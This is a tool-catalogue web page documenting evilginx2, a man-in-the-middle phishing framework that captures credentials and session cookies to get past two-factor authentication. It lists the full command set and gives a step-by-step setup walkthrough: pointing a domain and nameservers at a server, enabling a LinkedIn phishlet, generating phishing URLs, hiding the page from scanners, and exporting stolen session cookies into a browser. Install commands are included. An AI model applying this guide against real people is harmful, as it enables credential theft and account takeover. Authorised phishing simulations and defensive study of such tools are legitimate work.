You are here: Home » Exploitation Tools » evilginx2

evilginx2

evilginx2 Description

evilginx2 is a man-in-the-middle attack framework used for phishing login credentials along with session cookies, which in turn allows to bypass 2-factor authentication protection.

This tool is a successor to Evilginx, released in 2017, which used a custom version of nginx HTTP server to provide man-in-the-middle functionality to act as a proxy between a browser and phished website. Present version is fully written in GO as a standalone application, which implements its own HTTP and DNS server, making it extremely easy to set up and use.

Homepage: https://github.com/kgretzky/evilginx2

Author: Kuba Gretzky

License: GPLv3

evilginx2 Help

Usage:

./evilginx

Options:

  -debug
    	Enable debug output
  -developer
    	Enable developer mode (generates self-signed certificates for all hostnames)
  -p string
    	Phishlets directory path

evilginx2 Commands

general

    config : manage general configuration
 phishlets : manage phishlets configuration
  sessions : manage sessions and captured tokens with credentials
     lures : manage lures for generation of phishing urls
     clear : clears the screen

config

Shows values of all configuration variables and allows to change them.

                            config : show all configuration variables
            config domain <domain> : set base domain for all phishlets (e.g. evilsite.com)
            config ip <ip_address> : set ip address of the current server
        config redirect_key <name> : change name of the redirect parameter in phishing url (phishing urls will need to be regenerated)
    config verification_key <name> : change name of the verification parameter in phishing url (phishing urls will need to be regenerated)
 config verification_token <token> : change the value of the verification token (phishing urls will need to be regenerated)
         config redirect_url <url> : change the url where all unauthorized requests will be redirected to (phishing urls will need to be regenerated)

phishlets

Shows status of all available phishlets and allows to change their parameters and enabled status.

                                   phishlets : show status of all available phishlets
    phishlets hostname <phishlet> <hostname> : set hostname for given phishlet (e.g. this.is.not.a.phishing.site.evilsite.com)
                 phishlets enable <phishlet> : enables phishlet and requests ssl/tls certificate if needed
                phishlets disable <phishlet> : disables phishlet
                   phishlets hide <phishlet> : hides the phishing page, logging and redirecting all requests to it (good for avoiding scanners when sending out phishing links)
                 phishlets unhide <phishlet> : makes the phishing page available and reachable from the outside
 phishlets get-url <phishlet> <redirect_url> : generates phishing url with redirection on successful authentication
              phishlets get-hosts <phishlet> : generates entries for hosts file in order to use localhost for testing

sessions

Shows all captured credentials and authentication tokens. Allows to view full history of visits and delete logged sessions.

             sessions : show history of all logged visits and captured credentials
        sessions <id> : show session details, including captured authentication tokens, if available
 sessions delete <id> : delete logged session with <id> (ranges with separators are allowed e.g. 1-7,10-12,15-25)
  sessions delete all : delete all logged sessions

lures

Shows all create lures and allows to edit or delete them.

                                       lures : show all create lures
                                  lures <id> : show details of a lure with a given <id>
                     lures create <phishlet> : creates new lure for given <phishlet>
                           lures delete <id> : deletes lure with given <id>
                            lures delete all : deletes all created lures
                 lures edit path <id> <path> : sets custom url <path> for a lure with a given <id>
 lures edit redirect_url <id> <redirect_url> : sets redirect url that user will be navigated to on successful authorization, for a lure with a given <id>
         lures edit phishlet <id> <phishlet> : change the phishlet, the lure with a given <id> applies to
                 lures edit info <id> <info> : set personal information to describe a lure with a given <id> (display only)
            lures edit og_title <id> <title> : sets opengraph title that will be shown in link preview, for a lure with a given <id>
             lures edit og_desc <id> <title> : sets opengraph description that will be shown in link preview, for a lure with a given <id>
            lures edit og_image <id> <title> : sets opengraph image url that will be shown in link preview, for a lure with a given <id>
              lures edit og_url <id> <title> : sets opengraph url that will be shown in link preview, for a lure with a given <id>
          lures edit params <id> <key=value> : adds, edits or removes custom parameters (used in javascript injections), for a lure with a given <id>

evilginx2 Usage Example

To get up and running, you need to first do some setting up.

At this point I assume, you've already registered a domain (let's call it yourdomain.com) and you set up the nameservers (both ns1 and ns2) in your domain provider's admin panel to point to your server's IP (e.g. 10.0.0.1):

ns1.yourdomain.com = 10.0.0.1
ns2.yourdomain.com = 10.0.0.1

In the evilginx2 set up your server's domain and IP using following commands:

config domain yourdomain.com
config ip 10.0.0.1

Now you can set up the phishlet you want to use. For the sake of this short guide, we will use a LinkedIn phishlet. Set up the hostname for the phishlet (it must contain your domain obviously):

phishlets hostname linkedin my.phishing.hostname.yourdomain.com

And now you can enable the phishlet, which will initiate automatic retrieval of LetsEncrypt SSL/TLS certificates if none are locally found for the hostname you picked:

phishlets enable linkedin

Your phishing site is now live. Think of the URL, you want the victim to be redirected to on successful login and get the phishing URL like this (victim will be redirected to https://www.google.com):

phishlets get-url linkedin https://www.google.com

Running phishlets will only respond to tokenized links, so any scanners who scan your main domain will be redirected to URL specified as redirect_url under config. If you want to hide your phishlet and make it not respond even to valid tokenized phishing URLs, use phishlet hide/unhide <phishlet> command.

You can monitor captured credentials and session cookies with:

sessions

To get detailed information about the captured session, with the session cookie itself (it will be printed in JSON format at the bottom), select its session ID:

sessions <id>

The captured session cookie can be copied and imported into Chrome browser, using EditThisCookie extension.

Important! If you want evilginx2 to continue running after you log out from your server, you should run it inside a screen session.

How to install evilginx2

Installation on Kali Linux

wget -O evilginx_linux.zip https://github.com`curl -s https://github.com/kgretzky/evilginx2/releases | grep -E -o '/kgretzky/evilginx2/releases/download/[0-9.]+/evilginx_linux[0-9a-z._]+zip' | head -n 1`
unzip evilginx_linux.zip -d evilginx
rm evilginx_linux.zip
cd evilginx/
chmod 700 ./evilginx
sudo ./evilginx

Installation on Linux (Debian, Mint, Ubuntu)

wget -O evilginx_linux.zip https://github.com`curl -s https://github.com/kgretzky/evilginx2/releases | grep -E -o '/kgretzky/evilginx2/releases/download/[0-9.]+/evilginx_linux[0-9a-z._]+zip' | head -n 1`
unzip evilginx_linux.zip -d evilginx
rm evilginx_linux.zip
cd evilginx/
chmod 700 ./evilginx
sudo ./evilginx

evilginx2 Screenshots

evilginx2 Tutorials

Related tools

Also recommended: